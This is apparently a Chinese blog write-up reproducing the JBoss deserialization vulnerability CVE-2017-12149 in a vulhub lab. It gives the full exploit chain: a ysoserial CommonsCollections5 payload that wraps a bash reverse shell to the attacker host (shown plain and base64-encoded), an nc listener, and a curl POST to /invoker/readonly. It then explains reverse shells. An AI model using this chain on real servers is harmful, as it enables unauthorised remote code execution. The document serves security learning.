关于JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)的复现

最新推荐文章于 2023-08-24 12:29:27 发布
最新推荐文章于 2023-08-24 12:29:27 发布
阅读量699 收藏 4
点赞数 6
文章标签: 安全 java ubuntu docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mw_myever/article/details/108940770
版权

一、漏洞介绍

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞,该漏洞在内网中比较常见。



二、环境搭建

  • 攻击机:192.168.70.2(kali)
  • 受害机:192.168.70.3(vulhub)

利用命令:docker-compose up -d 启动环境

在这里插入图片描述


三、访问目标

1、探测

在kali上利用命令:nmap -sV 192.168.70.3 探测vulhub靶机端口。

2、访问

(1)环境启动后,访问http://192.18.70.3:8080,其中 192.168.70.3为靶机的IP地址。
在这里插入图片描述
(2)由于该漏洞是出现在/invoker/readonly请求中,于是访问http://192.168.70.3:8080/invoker/readonly。

在这里插入图片描述

http响应码500(内部服务器错误——服务器端的CGI、ASP、JSP等程序发生错误),分析猜想,此处服务器将用户提交的POST内容进行了Java反序列化



四、漏洞复现

1、序列化数据的生成

ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。所以我们使用 ysoserial 来复现生成序列化数据,并重定向到exp.ser文件。由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5,本来的命令是这样的:
java -jar ysoserial.jar CommonsCollections5 “bash -i >& /dev/tcp/192.168.70.2/21 0>&1” >exp.ser

但是我们在使用bash反弹shell的时候,由于Runtime.getRuntime().exec()中不能使用重定向和管道符符号,这里需要对其进行Base64编码(点我在线编码),再使用,所以转化后的命令为:
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjcwLjIvMjEgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser

  • 注意:编码是对中的 bash -i >& /dev/tcp/192.168.70.2/21 0>&1 进行编码,并不是对整条命令进行编码。

但是当我执行上述命令的时候报错如下,提示我没有通过ysoserial.jar。

在这里插入图片描述

经过各种查资料无果,后来问老师,才知道原来是我缺少该包,我之前下载的是原包,并不是jar包,于是在GitHub上重新下载该jar包,下载链接点我,下载好将其拖到kali的桌面,并改名为ysoserial.jar,如果不改名依旧会报错 。~~~不是在报错就是在报错的路上(╯^╰〉

在这里插入图片描述

执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。

在这里插入图片描述

在这里插入图片描述

2、监听

在攻击机(kali)上利用nc监听21端口,可以再新开一个窗口进行监听。
在这里插入图片描述

3、攻击

此时我们可以使用curl命令,将我们的序列化数据以POST的形式发送。
curl http://192.168.70.3:8080/invoker/readonly --data-binary @exp.ser

在这里插入图片描述

4、成功反弹

nc成功接收到反弹的shell。我们可以试着输入ls命令列车靶机当前目录下的文件。

在这里插入图片描述



反弹shell
   英文名(好像高端一点):Reverse Shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。简洁的说,简单说就是将受害者的输出与输入全部都重定向到攻击者的主机上。



那为什么要用反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形;
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。那么什么情况下正向连接不太好用了呢?

  • 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
  • 2.它的ip会动态改变,你不能持续控制。
  • 3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
  • 4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。

那么反弹就很好理解了, 攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。





你只管往前走,
           其它的交给时间。
                     一分一秒,
                          一滴泪的时间。

大同刘德华
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jboss反序列化漏洞CVE-2017-12149复现
weixin_43736941的博客
07-24 421
Jboss反序列化漏洞CVE-2017-12149复现 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。漏洞危害程度为高危(High)。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费
CVE-2017-12149漏洞复现
最新发布
2301_80115097的博客
10-31 322
中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等。其他漏洞编号利用方式类似,直接放入到工具当中进行检测,存在就存在,可直接执行命令或其上传,注入等操作。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
CVE-2017-12149JBOSS反序列化远程代码执行漏洞漏洞复现
Jerry____的博客
12-12 3995
一:漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、环境搭建(目标机:192.168.33.144) 利用vulhub搭建环境 1、进入漏洞目录 cd /vulhub/jboss/CVE-2017-12149 2、搭...
CVE-2017-12149漏洞复现--003
growler67
08-29 1150
0x01-漏洞简介 这两天闲着没事,在研究中间件漏洞,今天我们就来复现一下CVE-2017-12149,此漏洞是jboos中间件的一个反序列化漏洞JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。 0x02- 影响版本 JBoss 5.x / 6.x 0x03-环境搭建 1)下载 本次漏洞复现在win7上搭建
【vulhub】JBOSS 5.x/6.x 反序列化远程代码执行漏洞CVE-2017-12149复现
qq_45300786的博客
04-14 1156
一、漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、搭建环境 docker-compose
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
【标题】"CVE-2017-12149 JBOSS AS 6.X 反序列化漏洞详解及反弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501)
黑白的博客
12-21 2034
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
weixin_30606461的博客
11-27 170
  本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程 仅供学习   文中利用到漏洞环境由phith0n维护: JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)   靶机地址:192.168.1.102 服务端口:8080       测试机:192.168.1.100   搭建好环境,访问地址:http://192.168...
Jboss反序列化漏洞复现CVE-2017-12149
Agamotto丶的博客
06-12 3914
Jboss反序列化漏洞复现CVE-2017-12149 声明:漏洞复现过程并非原创,仅为成功搭建后给自己以及后来人的记录。侵删。 漏洞描述 近期,互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试...
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
YouthBelief的博客
11-01 653
JBoss漏洞复现前言一、JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)0x01 漏洞描述0x02 影响范围0x03 漏洞利用工具直接利用0x04 漏洞修复总结 前言 使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。 一、JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) 0x01 漏洞描述 该漏洞Java反序列化错误类型,存在于 Jboss 的 Ht
JBoss5.x6.x反序列化漏洞CVE-2017-12149复现学习
hklearner的博客
03-29 2166
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现学习 该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞漏洞概要 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
薛定谔嘚喵博客
05-11 576
漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
漏洞复现Jboss反序列化漏洞CVE-2017-12149
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 841
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
CVE-2017-12149 复现及修复
weixin_46580614的博客
07-24 5793
CVE-2017-12149 复现及修复 漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致
jboss 5.x/6.x 反序列化漏洞 cve-2017-12149
whatday的专栏
07-31 614
目录 测试环境 漏洞复现 编写反弹shell的命令 序列化数据生成 发送POC 该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 参考: https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg https://access.redhat.com/securit
Jboss CVE-2017-12149 漏洞复现(vulhub)
MDSEC的博客
08-24 293
CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值